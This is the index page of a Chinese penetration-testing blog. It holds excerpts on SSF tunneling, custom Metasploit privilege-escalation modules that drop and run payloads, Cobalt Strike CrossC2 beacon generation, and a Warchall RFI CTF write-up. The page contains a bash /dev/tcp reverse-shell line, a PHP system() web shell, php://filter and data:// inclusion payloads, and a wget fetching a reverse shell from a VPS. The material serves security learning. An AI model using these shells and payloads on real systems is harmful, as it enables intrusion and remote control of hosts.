InfoSec Learning


  • 首页

  • 归档

  • 标签

  • 搜索

windows提权导航页

发表于 2021-01-04 | 分类于 windows

windows内核漏洞

windows内核漏洞提权教程

阅读全文 »

ssf隧道

发表于 2021-01-03 | 分类于 tools

引子

当你凝视深渊的时候,深渊也在凝视着你。

环境

tuopu

ssf隧道

录制的视频:

  • SSF反向端口转发&动态转发

  • 多层内网隧道-SSF正向端口转发

socket 套接字是什么

12

带着问题去思考,何为正向,何为反向

正向端口转发

步骤一:

服务端执行:

upx-ssfd.exe -p 1080

服务端开启1080端口,进行监听

客户端执行:

ssf -D 9000 -p 1080 172.20.122.149(这个ip是服务端的ip)

连接服务端172.20.122.149的1080端口,使用本地9000进行动态端口转发。 图片1

图片2

反向端口转发

1
2
3
4
5
./upx-ssfd -p 1080

ssf.exe -R 转发到远程开放的端口:要连接的目标IP:要连接的目标IP的端口 -p ssf服务器开放的端口 ssf服务器IP

ssf.exe -R 1081:192.168.6.78:3389 -p 1080 192.168.5.8 /b

正向SOCKS代理

1
2
3
4
5
6
7
正向动态端口转发
upx-ssfd.exe -p 1080
./upx-ssf -D 本地要开放的端口 -p ssf服务器的端口 ssf服务器IP 
./upx-ssf -D 1081 -p 1080 192.168.142.133

proxychains配置
socks5 127.0.0.1:1081 

参考资料:

https://exposedholes.co.uk/2019/10/27/pivoting-on-windows-secure-socket-funneling/

https://securesocketfunneling.github.io/ssf/#home

阅读全文 »

一期纯粹的软件推荐文章

发表于 2021-01-03 | 分类于 tools

文件相关

文本编辑

  • https://notepad-plus-plus.org/downloads/

    markdown文档编辑器

  • https://hemashushu.github.io/yu-writer.site/ 优点是界面设计优秀,好看好用

  • https://typora.io/
  • https://github.com/jgm/pandoc 优点是插件多:支持markdown转docx格式

多人协同在线文档编辑

石墨文档

  • https://shimo.im/desktop

在线拓扑图

  • https://www.processon.com/

pdf阅读器

  • https://get.adobe.com/cn/reader/

多电脑文件同步软件

国内可以用:

  • http://www.verysync.com/

国外可以用:Resilio Sync

快速文件搜索

  • https://www.voidtools.com/zh-cn/

  • https://github.com/Wox-launcher/Wox

视频播放

  • https://daumpotplayer.com/download/

上传下载

给别人发大文件快传

https://cowtransfer.com/

多线程文件下载器

  • https://www.freedownloadmanager.org/zh/

祝百度早日倒闭

  • http://www.speedpan.net/

其他

开源密码管理软件

  • https://keepass.info/

录屏软件

https://mathewsachin.github.io/Captura/

翻墙软件

https://www.v2ray.com/

虚拟机管理

  • https://www.vmware.com/products/workstation-pro/workstation-pro-evaluation.html

windows平台ssh客户端

https://mobaxterm.mobatek.net/

阅读全文 »

msf写插件:建立一个新的session

发表于 2020-12-27 | 分类于 tools

msf 建立一个新的session

new_session.rb

作用是建立一个新的meterpreter session

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Kernel
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'new meterpreter session',
      'Description'    => %q{
        generate new meterpreter session
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'whale3070'   # Metasploit
        ],
      'DisclosureDate' => '2019-03-24',
      'References'     =>
        [
          ['URL', 'https://linux-audit.com/protect-ptrace-processes-kernel-yama-ptrace_scope/'],
          ['URL', 'https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html']
        ],
      'Platform'       => ['linux'],
      'Arch'           =>
        [
          ARCH_X86,
          ARCH_X64,
          ARCH_ARMLE,
          ARCH_AARCH64,
          ARCH_PPC,
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Targets'        => [['Auto', {}]],
      'DefaultOptions' =>
        {
          'PrependSetresuid' => true,
          'PrependSetresgid' => true,
          'PrependFork'      => true,
          'WfsDelay'         => 30
        },
      'DefaultTarget'  => 0))
    register_options [
      OptInt.new('TIMEOUT', [true, 'Process injection timeout (seconds)', '30'])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end
  
  def base_dir
    datastore['WritableDir'].to_s
  end

  def timeout
    datastore['TIMEOUT']
  end
  
  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end
  
  def exploit
        # Upload payload
    @payload_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}"
    upload @payload_path, generate_payload_exe
  end
  
  def on_new_session(session)
    if session.type.eql? 'meterpreter'
      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
      session.fs.file.rm @payload_path
    else
      session.shell_command_token "rm -f '#{@payload_path}'"
    end
  ensure
    super
  end
end

todo: 参考exploit/linux/local/ptrace_sudo_token_priv_esc,编写一个check函数,进行提权检查,然后run函数,进行提权利用。

sudo提权模块

写了一天,本来打算提权成功以后,获得一个root权限的meterpreter session,但是失败了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post

  include Msf::Post::File
  include Msf::Post::Linux::Kernel
  include Msf::Post::Linux::Priv
  include Msf::Auxiliary::Report
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  #include Msf::Exploit::Local

  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'Sudo Commands',
      'Description'   => %q{
        This module examines the sudoers configuration for the session user
        and lists the commands executable via sudo.

        This module also inspects each command and reports potential avenues
        for privileged code execution due to poor file system permissions or
        permitting execution of executables known to be useful for privesc,
        such as utilities designed for file read/write, user modification,
        or execution of arbitrary operating system commands.

        Note, you may need to provide the password for the session user.
      },
      'License'       => MSF_LICENSE,
      'Author'        => [ 'whale3070' ],
      'Platform'      => [ 'bsd', 'linux', 'osx', 'solaris', 'unix' ],
      'SessionTypes'  => [ 'meterpreter', 'shell' ]
    ))
    register_options [
      OptString.new('SUDO_PATH', [ true, 'Path to sudo executable', '/usr/bin/sudo' ]),
      OptString.new('PASSWORD', [ false, 'Password for the current user', '' ]),
      OptInt.new('TIMEOUT', [true, 'Process injection timeout (seconds)', '30'])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  def sudo_path
    datastore['SUDO_PATH'].to_s
  end
  
  def base_dir
    datastore['WritableDir'].to_s
  end

  def timeout
    datastore['TIMEOUT']
  end

  def password
    datastore['PASSWORD'].to_s
  end

  def is_executable?(path)
    cmd_exec("test -x '#{path}' && echo true").include? 'true'
  end

  def eop_bins
    %w[
      ash bash
    ]
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  #
  # Check if a sudo command offers prvileged code execution
  #
  def check_eop(cmd)
    # drop args for simplicity (at the risk of false positives)
    cmd = cmd.split(/\s/).first

    if cmd.eql? 'ALL'
      print_good 'sudo any command!'
      return true
    end

    base_dir  = File.dirname cmd
    base_name = File.basename cmd

    if file_exist? cmd
      if writable? cmd
        print_good "#{cmd} is writable!"
        return true
      end
    elsif writable? base_dir
      print_good "#{cmd} does not exist and #{base_dir} is writable!"
      return true
    end

    if eop_bins.include? base_name
      print_good "#{cmd} matches known privesc executable '#{base_name}' !"  #shell session type executing sudo ash command
      if cmd.start_with? '/bin/ash'
        cmd_exec("sudo ash")  
        print_good "executing sudo ash"
        #print_good "spawn new meterpreter session..."
        #@payload_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}"
        #upload @payload_path, generate_payload_exe
        #res = cmd_exec "#{@payload_path} & echo "
        #vprint_line res
      else
        puts "/bin/ash not found!"
      end
      return true
    end

    false
  end

  #
  # Retrieve list of sudo commands for current session user
  #
  def sudo_list
    # try non-interactive (-n) without providing a password
    cmd = "#{sudo_path} -n -l"
    vprint_status "Executing: #{cmd}"
    output = cmd_exec(cmd).to_s

    if output.start_with?('usage:') || output.include?('illegal option') || output.include?('a password is required')
      # try with a password from stdin (-S)
      cmd = "echo #{password} | #{sudo_path} -S -l"
      vprint_status "Executing: #{cmd}"
      output = cmd_exec(cmd).to_s
    end

    output
  end

  #
  # Format sudo output and extract permitted commands
  #
  def parse_sudo(sudo_data)
    cmd_data = sudo_data.scan(/may run the following commands.*?$(.*)\z/m).flatten.first

    # remove leading whitespace from each line and remove linewraps
    formatted_data = ''
    cmd_data.split("\n").reject { |line| line.eql?('') }.each do |line|
      formatted_line = line.gsub(/^\s*/, '').to_s
      if formatted_line.start_with? '('
        formatted_data << "\n#{formatted_line}"
      else
        formatted_data << " #{formatted_line}"
      end
    end

    formatted_data.split("\n").reject { |line| line.eql?('') }.each do |line|
      run_as = line.scan(/^\((.+?)\)/).flatten.first

      if run_as.blank?
        print_warning "Could not parse sudoers entry: #{line.inspect}"
        next
      end

      user = run_as.split(':')[0].to_s.strip || ''
      group = run_as.split(':')[1].to_s.strip || ''
      no_passwd = false

      cmds = line.scan(/^\(.+?\) (.+)$/).flatten.first
      if cmds.start_with? 'NOPASSWD:'
        no_passwd = true
        cmds = cmds.gsub(/^NOPASSWD:\s*/, '')
      end

      # Commands are separated by commas but may also contain commas (escaped with a backslash)
      # so we temporarily replace escaped commas with some junk
      # later, we'll replace each instance of the junk with a comma
      junk = Rex::Text.rand_text_alpha(10)
      cmds = cmds.gsub('\, ', junk)

      cmds.split(', ').each do |cmd|
        cmd = cmd.gsub(junk, ', ').strip

        if cmd.start_with? '('
          run_as = cmd.scan(/^\((.+?)\)/).flatten.first

          if run_as.blank?
            print_warning "Could not parse sudo command: #{cmd.inspect}"
            next
          end

          user = run_as.split(':')[0].to_s.strip || ''
          group = run_as.split(':')[1].to_s.strip || ''
          cmd = cmd.scan(/^\(.+?\) (.+)$/).flatten.first
        end

        msg = "Command: #{cmd.inspect}"
        msg << " RunAsUsers: #{user}" unless user.eql? ''
        msg << " RunAsGroups: #{group}" unless group.eql? ''
        msg << ' without providing a password' if no_passwd
        vprint_status msg

        eop = check_eop cmd

        @results << [cmd, user, group, no_passwd ? '' : 'True', eop ? 'True' : '']
      end
    end
  rescue => e
    print_error "Could not parse sudo ouput: #{e.message}"
  end

  def exploit
        # Upload payload
    print_good "spawn new meterpreter session..."
    @payload_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}"
    upload @payload_path, generate_payload_exe
  end

  def run
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    unless is_executable? sudo_path
      print_error 'Could not find sudo executable'
      return
    end

    output = sudo_list
    vprint_line output
    vprint_line

    if output.include? 'Sorry, try again'
      fail_with Failure::NoAccess, 'Incorrect password'
    end

    if output =~ /^Sorry, .* may not run sudo/
      fail_with Failure::NoAccess, 'Session user is not permitted to execute any commands with sudo'
    end

    if output !~ /may run the following commands/
      fail_with Failure::NoAccess, 'Incorrect password, or the session user is not permitted to execute any commands with sudo'
    end

    @results = Rex::Text::Table.new(
      'Header'  => 'Sudo Commands',
      'Indent'  => 2,
      'Columns' =>
        [
          'Command',
          'RunAsUsers',
          'RunAsGroups',
          'Password?',
          'Privesc?'
        ]
    )

    parse_sudo output

    if @results.rows.empty?
      print_status 'Found no sudo commands for the session user'
      return
    end

    print_line
    print_line @results.to_s

    path = store_loot(
      'sudo.commands',
      'text/csv',
      session,
      @results.to_csv,
      'sudo.commands.txt',
      'Sudo Commands'
    )

    print_good "Output stored in: #{path}"

    if session.type.eql? 'meterpreter'
      puts "This sessions is meterpreter session."
      exploit     

      print_status 'Executing payload...'
      res = cmd_exec "#{@payload_path} & echo "
      vprint_line res
    else
      puts "maybe shell session types"
      exploit
      print_status 'Executing payload...'
      res = cmd_exec "#{@payload_path} & echo "
      vprint_line res
    end
  end

  def on_new_session(session)
    if session.type.eql? 'meterpreter'
      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
      session.fs.file.rm @payload_path
    else
      session.shell_command_token "rm -f '#{@payload_path}'"
    end
  ensure
    super
  end
end

参考的模块exploit/linux/local/ptrace_sudo_token_priv_esc

复现sudo令牌窃取提权——ptrace Sudo Token Privilege Escalation

漏洞原理

https://onestraw.github.io/linux/ptrace-hack/

ptrace系统调从名字上看是用于进程跟踪的,它提供了父进程可以观察和控制其子进程执行的能力,并允许父进程检查和替换子进程的内核镜像(包括寄存器)的值。

漏洞复现

echo 0 > /proc/sys/kernel/yama/ptrace_scope

sudo ls

输入密码

普通用户输入sudo的密码,就可以使用exploit/linux/local/ptrace_sudo_token_priv_esc进行提权了。提权成功会返回一个root权限的meterpreter session

下一步计划

重写new_session模块,添加提权函数

阅读全文 »

msf的exp模块

发表于 2020-12-27 | 分类于 tools

msf的exp模块

分为4个部分

  1. class 定义类,导入的msf的类,叫mixins

  2. include 导入函数库

  3. 初始化,定义参数,模块的值

  4. 定义要执行的exp

如果语法写错了,可以在日志里看: /root/.msf4/logs/framework.log

1

写的demo,作用是调用tcp模块,进行ftp连接

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Seh
  include Msf::Exploit::Egghunter
  include Msf::Exploit::Tcp
  
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'whale_tcp_connect_test',
      'Description'    => %q{
        tcp connect
      },
      'License'        => MSF_LICENSE,
      'Author'         => ['whale3070'],
      'DisclosureDate' => '2020-12-27',
      'References'     =>
        [
          ['URL', 'https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html']
        ],
      'Platform'       => ['linux'],
      'Arch'           =>
        [
          ARCH_X86,
          ARCH_X64,
          ARCH_ARMLE,
          ARCH_AARCH64,
          ARCH_PPC,
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Targets'        => [['Auto', {}]],
      'DefaultOptions' =>
        {
          'PrependSetresuid' => true,
          'PrependSetresgid' => true,
          'PrependFork'      => true,
          'WfsDelay'         => 30
        },
      'DefaultTarget'  => 0))
    register_options( 
      [
      Opt::RPORT(21),
      ],self.class)
  end

  def exploit
    connect
    buf = rand_text_alpha(1024)
    buf << [ target.ret ].pack('V')
    buf << payload.encoded
    
    sock.put(buf)
    sock.get_once
    
    handler
  end
end
阅读全文 »

msf报错(SESSION may not be compatible)

发表于 2020-12-22 | 分类于 tools

msf报错(SESSION may not be compatible)

起因:sudo -s提权在msf上一直报错,但是在靶机上是可以成功提权的。

msf有一个模块,叫做post/multi/manage/sudo

看过这个模块的源码,就是使用sudo -s来提权的。

为什么会提权失败呢? 4

环境配置复现,debug

设置msf监听

handler -H 192.168.123.123 -P 6677 -p cmd/unix/reverse_bash

生成反弹shell的载荷

1
2
3
msfvenom -p cmd/unix/reverse_bash  lhost=192.168.123.123 lport=6677 -f raw      

0<&165-;exec 165<>/dev/tcp/192.168.123.123/6677;sh <&165 >&165 2>&165

设置metapreter session

使用上一条命令获得一个shell cmd/unix类型的shell以后,可以使用session -u session的ID 这种方式,获得一个meterpreter x86/linux的session。

使用meterpreter的session,执行post/multi/manage/sudo提权载荷,会报错。

1
[!] SESSION may not be compatible with this module.

使用shell cmd/unix的载荷不会报错。

查看源码

1
2
3
4
5
vi /usr/share/metasploit-framework/modules/post/multi/manage/sudo.rb

在第32行,如果没有meterpreter这一个关键字,那么就只支持shell类型的session

 'SessionTypes'  => [ 'meterpreter', 'shell' ]

如何写一个msf插件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::Windows::WMIC

  def initialize(info={})
    super( update_info( info,
      'Name'          => 'Windows Gather Run Specified WMIC Command',
      'Description'   => %q{ This module will execute a given WMIC command options or read
        WMIC commands options from a resource file and execute the commands in the
        specified Meterpreter session.},
      'License'       => MSF_LICENSE,
      'Author'        => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
      'Platform'      => [ 'win' ],
      'SessionTypes'  => [ 'meterpreter' ]
    ))

    register_options(
      [
        OptPath.new('RESOURCE', [false, 'Full path to resource file to read commands from.']),
        OptString.new('COMMAND', [false, 'WMIC command options.']),
      ])
  end

  # Run Method for when run command is issued
  def run
        print_status("Executing command")
        command = wmic_query("useraccount get name")
        puts command
  end
end
阅读全文 »

linux提权-msf提权插件编写中

发表于 2020-12-20 | 分类于 linux

linux提权-msf提权插件编写中

阅读全文 »

cobaltstrike的脚本(四)

发表于 2020-12-13 | 分类于 cobaltstrike

linux上线插件CrossC2

录制的视频: CobaltStrike的插件

1
2
3
4
5
6
7
8
9
1. src目录下,修改cna
$CC2_PATH
$CC2_BIN

2. 添加证书
.cobaltstrike.beacon_keys

3. 
./genCrossC2.Linux 18.163.137.185 6677 /root/tool/cobaltstrike/CrossC2-master/.cobaltstrike.beacon_keys null Linux x64 test

windows辅助插件-梼杌

具有信息搜集、提权、横向移动等功能。 https://github.com/pandasec888/taowu-cobalt-strike

参考资料

  • https://github.com/gloxec/CrossC2#customextension
  • https://www.cobaltstrike.com/help-scripting
  • https://www.wangan.com/articles/1069
阅读全文 »

2021年学习计划

发表于 2020-12-12 | 分类于 experience

引子

业精于勤荒于嬉,行成于思毁于随

阅读全文 »

Warchall Live RFI 远程文件包含

发表于 2020-12-05 | 分类于 CTF

题目地址

访问http://rfi.warchall.net/。

web目录fuzz,以及index.php查看源码

远程命令执行漏洞

查看文件

1
2
3
4
5
6
7
8
9
http://rfi.warchall.net/temp/payload.php?cmd=ls
conf.txt
index.php.bak
live_rfi.config.php.bak
payload.php
sol.php~
sol.txt
solution.php.bak
tplc

http://rfi.warchall.net/temp/payload.php?cmd=pwd

/home/level/15_live_rfi/www/temp

11


1
2
3
4
5
6
7
8
9
10
11
12
13
http://rfi.warchall.net/temp/payload.php?cmd=ls%20-al%20/home/level/15_live_rfi/www

total 44
drwxr-x--- 5 root level15 4096 Jun  3  2012 .
drwxr-x--- 3 root level15 4096 May  8  2012 ..
drwxr-x--- 2 root level15 4096 May  8  2012 cache
-rwxr-x--- 1 root level15  168 Jun  3  2012 de
-rwxr-x--- 1 root level15  157 Jun  3  2012 en
-rwxr-x--- 1 root level15  894 Jun  3  2012 index.php
-rwxr-x--- 1 root level15 4762 Mar 14  2014 live_rfi.config.php
-rwxr-x--- 1 root level15  300 Jun  3  2012 solution.php
drwxrwx--- 3 root level15 4096 Jan 18  2019 temp
drwxr-x--- 4 root level15 4096 Jun  3  2012 tpl

获得flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
http://rfi.warchall.net/index.php?lang=php://filter/convert.base64-encode/resource=temp/payload.php

echo PHByZT48P3BocCBzeXN0ZW0oJF9HRVRbImNtZCJdKTsgPz48L3ByZT4=| base64 -d
<pre><?php system($_GET["cmd"]); ?></pre>

---
http://rfi.warchall.net/temp/payload.php?cmd=whoami

level15
权限不够,无法执行wget shell写入

---
http://rfi.warchall.net/temp/payload.php?cmd=pwd

/home/level/15_live_rfi/www/temp

---

`http://rfi.warchall.net/temp/payload.php?cmd=base64 /home/level/15_live_rfi/www/solution.php`

将solution.php base64编码,然后本地或者在线网站解码,翻到最下面就可以得到flag。

尝试写入shell

本地开启python server,放一个反弹shell的php脚本。

1
2
3
4
5
6
curl http://rfi.warchall.net/temp/payload.php?cmd=wget http://vps's IP:8080/php-reverse-shell.php -P /tmp/whale.php

目标机器成功访问vps的php-reverse-shell.php,但没有写入whale.php
---
http://rfi.warchall.net/temp/payload.php?cmd=ls /tmp/whale.php

没有成功在/tmp目录下写入shell。原因可能是权限太低了。

writeup

1
2
3
4
5
6
7
8
9
10
11
import requests

url = "http://rfi.warchall.net/index.php"

params = {
    "lang": "data://text/plain,<?php print file_get_contents('solution.php',true);?>"
}

r = requests.get(url, params=params, verify=False)
print r.content

这是个什么操作?

访问http://rfi.warchall.net/index.php?lang=data://text/plain,<?php print file_get_contents('solution.php',true);?>

反正失败了,没得到solution.php的结果。使用另外一种伪协议php filter

http://rfi.warchall.net/index.php?lang=php://filter/convert.base64-encode/resource=/home/level/15_live_rfi/www/solution.php

1
echo PGh0bWw+Cjxib2R5Pgo8cHJlPk5PVEhJTkcgSEVSRT8/Pz88L3ByZT4KPC9ib2R5Pgo8L2h0bWw+CgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8P3BocCByZXR1cm4gJ0xvd19INE5HSU5HX0ZydWl0JzsgPz4K | base64 -d

同样可以获得solution.php

总结

出题方,肯定不会让人写入shell,或者反弹shell,不然服务器稳定性肯定会出问题。说不定会有些人写入垃圾数据塞满磁盘等等。

rfi和lfi的区别在于,远程文件包含危害更大,可以访问攻击者指定的文件。

在这里如果http://rfi.warchall.net/temp/payload.php?cmd=wget http://vps's IP:8080/php-reverse-shell.php -P /tmp/whale.php有写权限的话,就可以得到一个shell。而本地文件包含一般要通过文件上传的方式去传一个shell,然后再通过本地文件包含漏洞去执行,而rfi就不用。

不过这里payload.php看起来像是远程命令执行漏洞,不是个rfi。而其他人的writeup虽然使用了data伪协议,去访问flag,但看起来好像还是个lfi漏洞。可能是题目没出好。

感觉没有让做题的人深刻的感受到rfi与lfi的区别,只是用了一下伪协议的知识点。

参考资料

浅谈文件包含漏洞

阅读全文 »

linux内核升级&降级

发表于 2020-11-30 | 分类于 linux

引子

阅读全文 »

linux计划任务提权

发表于 2020-11-29 | 分类于 linux
1
2
3
靶机地址
ssh user@192.168.28.131
password123

计划任务中的相对路径&绝对路径

阅读全文 »
1 2 … 33
whale

whale

Aimed at Pro Penetration tester. Email me "weaponmaster3070@gmail.com"

394 日志
31 分类
44 标签
github
© 2021 whale
由 Jekyll 强力驱动
主题 - NexT.Mist
本站访客数 人 总访问量 次